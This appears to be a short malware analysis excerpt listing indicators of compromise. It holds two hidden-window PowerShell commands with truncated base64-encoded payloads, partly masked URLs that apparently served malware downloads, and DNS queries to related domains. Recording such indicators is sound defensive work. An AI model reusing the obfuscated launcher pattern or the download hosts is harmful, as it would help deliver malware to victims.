Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHQAbQBmAGYAZQB6AGgAeAB4AHQAeABtAD0AJwBOAHMAYQBoAGIAZwB3AHUAZwByACcAOwAkAFMAdABqAHIAawBkAHUAZwAgAD0AIAAnADcANAAnADsAJABNAGoAaABnAGQAbgBoAHEAYQBhAD0AJwBaAGcAeABsAGsAdQBoAHoAJwA...
- http://ku##hai.com/wp-includes/7fslng/
- http://lo###thai99.com/cgi-bin/Aef/
- http://ka###nyali.net/TEST777/unsqe/
- DNS ASK ku##hai.com
- DNS ASK lo###thai99.com
- DNS ASK ho####koration.site
- DNS ASK ka###nyali.net
- DNS ASK me####fatih.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHQAbQBmAGYAZQB6AGgAeAB4AHQAeABtAD0AJwBOAHMAYQBoAGIAZwB3AHUAZwByACcAOwAkAFMAdABqAHIAawBkAHUAZwAgAD0AIAAnADcANAAnADsAJABNAGoAaABnAGQAbgBoAHEAYQBhAD0AJwBaAGcAeABsAGsAdQBoAHoAJwA...' (with hidden window)